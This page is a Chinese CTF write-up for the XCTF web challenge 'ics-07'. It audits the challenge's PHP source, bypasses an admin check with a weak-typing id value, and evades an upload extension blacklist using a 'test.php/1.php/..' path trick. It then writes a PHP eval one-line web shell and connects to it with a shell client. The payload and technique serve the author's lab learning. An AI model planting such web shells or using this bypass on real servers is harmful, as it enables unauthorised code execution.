



<!doctype html>
<html lang="zh" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      <meta http-equiv="x-ua-compatible" content="ie=edge">
      
        <meta name="description" content="drkless docs">
      
      
        <link rel="canonical" href="https://darkless.cn/my-docs/XCTF-web-ics-07/">
      
      
        <meta name="author" content="hand">
      
      
        <meta name="lang:clipboard.copy" content="复制">
      
        <meta name="lang:clipboard.copied" content="已复制">
      
        <meta name="lang:search.language" content="ja">
      
        <meta name="lang:search.pipeline.stopwords" content="True">
      
        <meta name="lang:search.pipeline.trimmer" content="True">
      
        <meta name="lang:search.result.none" content="没有找到符合条件的结果">
      
        <meta name="lang:search.result.one" content="找到 1 个符合条件的结果">
      
        <meta name="lang:search.result.other" content="# 个符合条件的结果">
      
        <meta name="lang:search.tokenizer" content="[\uff0c\u3002]+">
      
      <link rel="shortcut icon" href="../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.0.4, mkdocs-material-4.4.2">
    
    
      
        <title>ics-07 - DarkLess</title>
      
    
    
      <link rel="stylesheet" href="../assets/stylesheets/application.30686662.css">
      
        <link rel="stylesheet" href="../assets/stylesheets/application-palette.a8b3c06d.css">
      
      
        
        
        <meta name="theme-color" content="">
      
    
    
      <script src="../assets/javascripts/modernizr.74668098.js"></script>
    
    
      
    
    <link rel="stylesheet" href="../assets/fonts/material-icons.css">
    
    
    
      
        
<script>
  window.ga = window.ga || function() {
    (ga.q = ga.q || []).push(arguments)
  }
  ga.l = +new Date
  /* Setup integration and send page view */
  ga("create", "None", "auto")
  ga("set", "anonymizeIp", true)
  ga("send", "pageview")
  /* Register handler to log search on blur */
  document.addEventListener("DOMContentLoaded", () => {
    if (document.forms.search) {
      var query = document.forms.search.query
      query.addEventListener("blur", function() {
        if (this.value) {
          var path = document.location.pathname;
          ga("send", "pageview", path + "?q=" + this.value)
        }
      })
    }
  })
</script>
<script async src="https://www.google-analytics.com/analytics.js"></script>
      
    
    
  </head>
  
    
    
    <body dir="ltr" data-md-color-primary="white" data-md-color-accent="deep-orange">
  
    <svg class="md-svg">
      <defs>
        
        
      </defs>
    </svg>
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" data-md-component="overlay" for="__drawer"></label>
    
      <a href="#_1" tabindex="1" class="md-skip">
        跳转至
      </a>
    
    
      <header class="md-header" data-md-component="header">
  <nav class="md-header-nav md-grid">
    <div class="md-flex">
      <div class="md-flex__cell md-flex__cell--shrink">
        <a href="https://darkless.cn/my-docs/" title="DarkLess" class="md-header-nav__button md-logo">
          
            <i class="md-icon">book</i>
          
        </a>
      </div>
      <div class="md-flex__cell md-flex__cell--shrink">
        <label class="md-icon md-icon--menu md-header-nav__button" for="__drawer"></label>
      </div>
      <div class="md-flex__cell md-flex__cell--stretch">
        <div class="md-flex__ellipsis md-header-nav__title" data-md-component="title">
          
            <span class="md-header-nav__topic">
              DarkLess
            </span>
            <span class="md-header-nav__topic">
              
                ics-07
              
            </span>
          
        </div>
      </div>
      <div class="md-flex__cell md-flex__cell--shrink">
        
          <label class="md-icon md-icon--search md-header-nav__button" for="__search"></label>
          
<div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" placeholder="搜索" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="query" data-md-state="active">
      <label class="md-icon md-search__icon" for="__search"></label>
      <button type="reset" class="md-icon md-search__icon" data-md-component="reset" tabindex="-1">
        &#xE5CD;
      </button>
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" data-md-scrollfix>
        <div class="md-search-result" data-md-component="result">
          <div class="md-search-result__meta">
            键入以开始搜索
          </div>
          <ol class="md-search-result__list"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
        
      </div>
      
    </div>
  </nav>
</header>
    
    <div class="md-container">
      
        
      
      
        

  

<nav class="md-tabs md-tabs--active" data-md-component="tabs">
  <div class="md-tabs__inner md-grid">
    <ul class="md-tabs__list">
      
        
  <li class="md-tabs__item">
    
      <a href=".." class="md-tabs__link">
        首页
      </a>
    
  </li>

      
        
  
  
    <li class="md-tabs__item">
      
        <a href="../DVWA-Brute-Force/" class="md-tabs__link">
          DVWA解题
        </a>
      
    </li>
  

      
        
  
  
    <li class="md-tabs__item">
      
        <a href="../XCTF-primary-writeup/" class="md-tabs__link">
          XCTF初级wp
        </a>
      
    </li>
  

      
        
  
  
    <li class="md-tabs__item">
      
        <a href="../XCTF-challenge-writeup/" class="md-tabs__link md-tabs__link--active">
          XCTF高级wp
        </a>
      
    </li>
  

      
    </ul>
  </div>
</nav>
      
      <main class="md-main" role="main">
        <div class="md-main__inner md-grid" data-md-component="container">
          
            
              <div class="md-sidebar md-sidebar--primary" data-md-component="navigation">
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    <nav class="md-nav md-nav--primary" data-md-level="0">
  <label class="md-nav__title md-nav__title--site" for="__drawer">
    <a href="https://darkless.cn/my-docs/" title="DarkLess" class="md-nav__button md-logo">
      
        <i class="md-icon">book</i>
      
    </a>
    DarkLess
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
      


  <li class="md-nav__item">
    <a href=".." title="首页" class="md-nav__link">
      首页
    </a>
  </li>

    
      
      
      


  <li class="md-nav__item md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-2" type="checkbox" id="nav-2">
    
    <label class="md-nav__link" for="nav-2">
      DVWA解题
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="1">
      <label class="md-nav__title" for="nav-2">
        DVWA解题
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../DVWA-Brute-Force/" title="Brute Force" class="md-nav__link">
      Brute Force
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../DVWA-Command-Injection/" title="Command Injection" class="md-nav__link">
      Command Injection
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../DVWA-CSRF/" title="CSRF" class="md-nav__link">
      CSRF
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../DVWA-File-Inclusion/" title="File Inclusion" class="md-nav__link">
      File Inclusion
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../DVWA-File-Upload/" title="File Upload" class="md-nav__link">
      File Upload
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../DVWA-sql-injection/" title="SQL Injection" class="md-nav__link">
      SQL Injection
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../DVWA-sql-blind-injection/" title="SQL Blind Injection" class="md-nav__link">
      SQL Blind Injection
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../DVWA-Weak Session IDs/" title="Weak Session ID" class="md-nav__link">
      Weak Session ID
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../DVWA-XSS-DOM/" title="XSS-DOM" class="md-nav__link">
      XSS-DOM
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../DVWA-XSS-Reflected/" title="XSS-Reflected" class="md-nav__link">
      XSS-Reflected
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../DVWA-XSS-Stored/" title="XSS-Stored" class="md-nav__link">
      XSS-Stored
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

    
      
      
      


  <li class="md-nav__item md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-3" type="checkbox" id="nav-3">
    
    <label class="md-nav__link" for="nav-3">
      XCTF初级wp
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="1">
      <label class="md-nav__title" for="nav-3">
        XCTF初级wp
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-primary-writeup/" title="XCTF-primary-writeUp" class="md-nav__link">
      XCTF-primary-writeUp
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-view_source/" title="view_source" class="md-nav__link">
      view_source
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-get_post/" title="get_post" class="md-nav__link">
      get_post
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-robots/" title="robots" class="md-nav__link">
      robots
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-backup/" title="backup" class="md-nav__link">
      backup
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-cookie/" title="cookie" class="md-nav__link">
      cookie
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-disable_buttom/" title="disable_buttom" class="md-nav__link">
      disable_buttom
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-simplejs/" title="simple_js" class="md-nav__link">
      simple_js
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-xff_refer/" title="xff_refer" class="md-nav__link">
      xff_refer
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-weak_auth/" title="weak_auth" class="md-nav__link">
      weak_auth
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-webshell/" title="webshell" class="md-nav__link">
      webshell
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-command_execution/" title="command_execution" class="md-nav__link">
      command_execution
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-simple_php/" title="simple_php" class="md-nav__link">
      simple_php
    </a>
  </li>

        
      </ul>
    </nav>
  </li>

    
      
      
      

  


  <li class="md-nav__item md-nav__item--active md-nav__item--nested">
    
      <input class="md-toggle md-nav__toggle" data-md-toggle="nav-4" type="checkbox" id="nav-4" checked>
    
    <label class="md-nav__link" for="nav-4">
      XCTF高级wp
    </label>
    <nav class="md-nav" data-md-component="collapsible" data-md-level="1">
      <label class="md-nav__title" for="nav-4">
        XCTF高级wp
      </label>
      <ul class="md-nav__list" data-md-scrollfix>
        
        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-challenge-writeup/" title="XCTF-challenge-writeUp" class="md-nav__link">
      XCTF-challenge-writeUp
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-Cat/" title="Cat" class="md-nav__link">
      Cat
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-ics-06/" title="ics-06" class="md-nav__link">
      ics-06
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-NewsCenter/" title="NewsCenter" class="md-nav__link">
      NewsCenter
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-mfw/" title="mfw" class="md-nav__link">
      mfw
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-NaNNaNNaNNaN-Batman/" title="NaNNaNNaNNaN-Batman" class="md-nav__link">
      NaNNaNNaNNaN-Batman
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-upload/" title="upload" class="md-nav__link">
      upload
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-PHP2/" title="PHP2" class="md-nav__link">
      PHP2
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-unserialize3/" title="unserialize3" class="md-nav__link">
      unserialize3
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-ics-05/" title="ics-05" class="md-nav__link">
      ics-05
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-bug/" title="bug" class="md-nav__link">
      bug
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-web2/" title="web2" class="md-nav__link">
      web2
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-wtf.sh-150/" title="wft.sh-150" class="md-nav__link">
      wft.sh-150
    </a>
  </li>

        
          
          
          


  <li class="md-nav__item">
    <a href="../XCTF-web-i-got-id-200/" title="i-got-id-200" class="md-nav__link">
      i-got-id-200
    </a>
  </li>

        
          
          
          

  


  <li class="md-nav__item md-nav__item--active">
    
    <input class="md-toggle md-nav__toggle" data-md-toggle="toc" type="checkbox" id="__toc">
    
    
      <label class="md-nav__link md-nav__link--active" for="__toc">
        ics-07
      </label>
    
    <a href="./" title="ics-07" class="md-nav__link md-nav__link--active">
      ics-07
    </a>
    
      
<nav class="md-nav md-nav--secondary">
  
  
  
    <label class="md-nav__title" for="__toc">目录</label>
    <ul class="md-nav__list" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#_1" class="md-nav__link">
    题目描述
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#_2" class="md-nav__link">
    思路
  </a>
  
</li>
      
      
      
      
      
    </ul>
  
</nav>
    
  </li>

        
      </ul>
    </nav>
  </li>

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              <div class="md-sidebar md-sidebar--secondary" data-md-component="toc">
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    
<nav class="md-nav md-nav--secondary">
  
  
  
    <label class="md-nav__title" for="__toc">目录</label>
    <ul class="md-nav__list" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#_1" class="md-nav__link">
    题目描述
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#_2" class="md-nav__link">
    思路
  </a>
  
</li>
      
      
      
      
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          <div class="md-content">
            <article class="md-content__inner md-typeset">
              
                
                
                  <h1>ics-07</h1>
                
                <h2 id="_1">题目描述</h2>
<p>工控云管理系统项目管理页面解析漏洞</p>
<h2 id="_2">思路</h2>
<p>打开题目，点击左侧导航进入项目管理页</p>
<p><img alt="20190907175624.png" src="https://raw.githubusercontent.com/handbye/images/master/20190907175624.png" /></p>
<p>可看到可以查看源码</p>
<p><img alt="20190907175654.png" src="https://raw.githubusercontent.com/handbye/images/master/20190907175654.png" /></p>
<p>源码如下：</p>
<pre><code class="php">&lt;!DOCTYPE html&gt;
&lt;html&gt;
  &lt;head&gt;
    &lt;meta charset=&quot;utf-8&quot;&gt;
    &lt;title&gt;cetc7&lt;/title&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;?php
    session_start();

    if (!isset($_GET[page])) {
      show_source(__FILE__);
      die();
    }

    if (isset($_GET[page]) &amp;&amp; $_GET[page] != 'index.php') {
      include('flag.php');
    }else {
      header('Location: ?page=flag.php');
    }

    ?&gt;

    &lt;form action=&quot;#&quot; method=&quot;get&quot;&gt;
      page : &lt;input type=&quot;text&quot; name=&quot;page&quot; value=&quot;&quot;&gt;
      id : &lt;input type=&quot;text&quot; name=&quot;id&quot; value=&quot;&quot;&gt;
      &lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;submit&quot;&gt;
    &lt;/form&gt;
    &lt;br /&gt;
    &lt;a href=&quot;index.phps&quot;&gt;view-source&lt;/a&gt;

    &lt;?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = &quot;backup/&quot;.$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
          die(&quot;Bad file extension&quot;);
       }else{
            chdir('uploaded');
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
     ?&gt;

    &lt;?php
      if (isset($_GET[id]) &amp;&amp; floatval($_GET[id]) !== '1' &amp;&amp; substr($_GET[id], -1) === '9') {
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);
        $sql=&quot;select * from cetc007.user where id='$id'&quot;;
        $result = mysql_query($sql);
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die(&quot;&lt;br &gt;something wae wrong ! &lt;br&gt;&quot;);
      if($result){
        echo &quot;id: &quot;.$result-&gt;id.&quot;&lt;/br&gt;&quot;;
        echo &quot;name:&quot;.$result-&gt;user.&quot;&lt;/br&gt;&quot;;
        $_SESSION['admin'] = True;
      }
     ?&gt;

  &lt;/body&gt;
&lt;/html&gt;
</code></pre>

<p>对源码进行审计</p>
<p><img alt="20190907175802.png" src="https://raw.githubusercontent.com/handbye/images/master/20190907175802.png" /></p>
<p>这段说当session为admin时可以上传文件，文件会保存到<code>uploaded/backup</code>目录下，但是使用黑名单过滤掉了<code>ph(p[3457]?|t|tml)</code>这些后缀。</p>
<p><img alt="20190907175957.png" src="https://raw.githubusercontent.com/handbye/images/master/20190907175957.png" /></p>
<p>这段说当传入的id值浮点值不能为1，但是id的最后一个数必须为9，session才能为admin。</p>
<p>利用php弱类型语言的特性可轻松绕过这一限制。</p>
<p>如下：</p>
<p><img alt="20190907180230.png" src="https://raw.githubusercontent.com/handbye/images/master/20190907180230.png" /></p>
<p>当id为1a9时可符合上面的要求。</p>
<p><img alt="20190907180310.png" src="https://raw.githubusercontent.com/handbye/images/master/20190907180310.png" /></p>
<p><img alt="20190907180646.png" src="https://raw.githubusercontent.com/handbye/images/master/20190907180646.png" /></p>
<p>可看到现在已经是admin用户了，那就继续上传文件拿到shell。原本想的这里是否可以进行注入，是代码中使用了<code>mysql_real_escape_string()</code>函数 , 该函数用于转义SQL语句中使用的字符串中的特殊字符 , 防御SQL注入 . 虽然可以利用宽字符注入绕过这个防御机制 , 但是要求目标站点使用GBK编码 . 这些细节信息我都不知道 , 所以想要注入是比较难的.</p>
<p>那么如何访问上传的文件已经不再是问题 , 需要做的仅仅是突破这个正则过滤 . 正则对文件后缀进行限制 . 所以关键点还是在文件后缀名上</p>
<p>如何突破文件后缀名的限制?主要思路有如下三点</p>
<p>一种是Web中间件的解析漏洞 , 因为已经知道中间件是Apache2 , 使用的是PHP . 所以无非就是Apache解析漏洞或者PHP CGI解析漏洞</p>
<p>一种是通过上传.htaccess文件 , 该文件是Apache的一大特色 . 其中一个功能便是修改不同MIME类型文件使用的解析器 . 但要使用该功能需要Apache在配置文件中设置AllowOverride All , 并且启用Rewrite模块 , 经过测试发现上传的.htaccess无法生效</p>
<pre><code class="php"># 举个例子 : 上传 .htaccess 文件 , 其中写入如下内容
 &lt;FilesMatch &quot;shell.jpg&quot;&gt;
    SetHandler application/x-httpd-php
&lt;/FilesMatch&gt;
# 此时 , shell.jpg 会被解析为PHP文件
# 但是经过测试这里 .htaccess 功能被禁用了
</code></pre>

<p>罕见文件后缀 , 想要解析PHP文件 , 并非后缀要是*.php . 如果查看mime.types , 会发现很多文件后缀都使用了application/x-httpd-php这个解析器</p>
<p><img alt="20190907181021.png" src="https://raw.githubusercontent.com/handbye/images/master/20190907181021.png" /></p>
<p>其中 phps 和 php3p 都是源代码文件 , 无法被执行 . 而剩下所有的后缀都被正则表过滤 , 所以这种方式也无法成功上传可执行文件</p>
<p>所以最后还是回到了中间件解析漏洞上 , 但是经过测试发现并不是常规的解析漏洞 , 而是利用了一个Linux的目录结构特性 , 请看下面代码</p>
<p><img alt="20190907181102.png" src="https://raw.githubusercontent.com/handbye/images/master/20190907181102.png" /></p>
<p>创建了一个目录为1.php , 在 1.php 下创建了一个子目录为 2.php 。Linux下每创建一个新目录 , 都会在其中自动创建两个隐藏文件。</p>
<p><img alt="20190907181148.png" src="https://raw.githubusercontent.com/handbye/images/master/20190907181148.png" /></p>
<p>其中 <code>..</code> 代表当前目录的父目录 , <code>.</code>代表当前目录 , 所以这里访问 <code>./1.php/2.php/..</code> 代表访问 <code>2.php</code>的父目录 , 也就是访问 <code>1.php</code> 。</p>
<p>因此这里构造数据包时 , 可以构造如下POST数据</p>
<pre><code class="php">con=&lt;?php @eval($_POST[cmd]);?&gt;&amp;file=test.php/1.php/..
</code></pre>

<p><img alt="20190907181726.png" src="https://raw.githubusercontent.com/handbye/images/master/20190907181726.png" /></p>
<p>然后访问上传目录</p>
<p><img alt="20190907181816.png" src="https://raw.githubusercontent.com/handbye/images/master/20190907181816.png" /></p>
<p>可看到已将test.php上传了上去。</p>
<p>使用菜刀连接，即可得到shell，然后找到falg即可</p>
<p><img alt="20190907182101.png" src="https://raw.githubusercontent.com/handbye/images/master/20190907182101.png" /></p>
<p><img alt="20190907182114.png" src="https://raw.githubusercontent.com/handbye/images/master/20190907182114.png" /></p>
<p>参考：</p>
<ul>
<li><a href="http://www.guildhab.top/?p=481">http://www.guildhab.top/?p=481</a></li>
</ul>
                
                  
                
              
              
                


              
            </article>
          </div>
        </div>
      </main>
      
        
<footer class="md-footer">
  
    <div class="md-footer-nav">
      <nav class="md-footer-nav__inner md-grid">
        
          <a href="../XCTF-web-i-got-id-200/" title="i-got-id-200" class="md-flex md-footer-nav__link md-footer-nav__link--prev" rel="prev">
            <div class="md-flex__cell md-flex__cell--shrink">
              <i class="md-icon md-icon--arrow-back md-footer-nav__button"></i>
            </div>
            <div class="md-flex__cell md-flex__cell--stretch md-footer-nav__title">
              <span class="md-flex__ellipsis">
                <span class="md-footer-nav__direction">
                  上一页
                </span>
                i-got-id-200
              </span>
            </div>
          </a>
        
        
      </nav>
    </div>
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-footer-copyright">
        
          <div class="md-footer-copyright__highlight">
            Copyright &copy;2019 darkless
          </div>
        
        powered by
        <a href="https://www.mkdocs.org">MkDocs</a>
        and
        <a href="https://squidfunk.github.io/mkdocs-material/">
          Material for MkDocs</a>
      </div>
      
  <div class="md-footer-social">
    <link rel="stylesheet" href="../assets/fonts/font-awesome.css">
    
      <a href="http://darkless.cn" class="md-footer-social__link fa fa-globe"></a>
    
      <a href="https://github.com/handbye" class="md-footer-social__link fa fa-github-alt"></a>
    
      <a href="https://weibo.com/handbye" class="md-footer-social__link fa fa-weibo"></a>
    
  </div>

    </div>
  </div>
</footer>
      
    </div>
    
      <script src="../assets/javascripts/application.c648116f.js"></script>
      
        
        
          
          <script src="../assets/javascripts/lunr/lunr.stemmer.support.js"></script>
          
            
              
                <script src="../assets/javascripts/lunr/tinyseg.js"></script>
              
              
                <script src="../assets/javascripts/lunr/lunr.ja.js"></script>
              
            
          
          
        
      
      <script>app.initialize({version:"1.0.4",url:{base:".."}})</script>
      
    
  </body>
</html>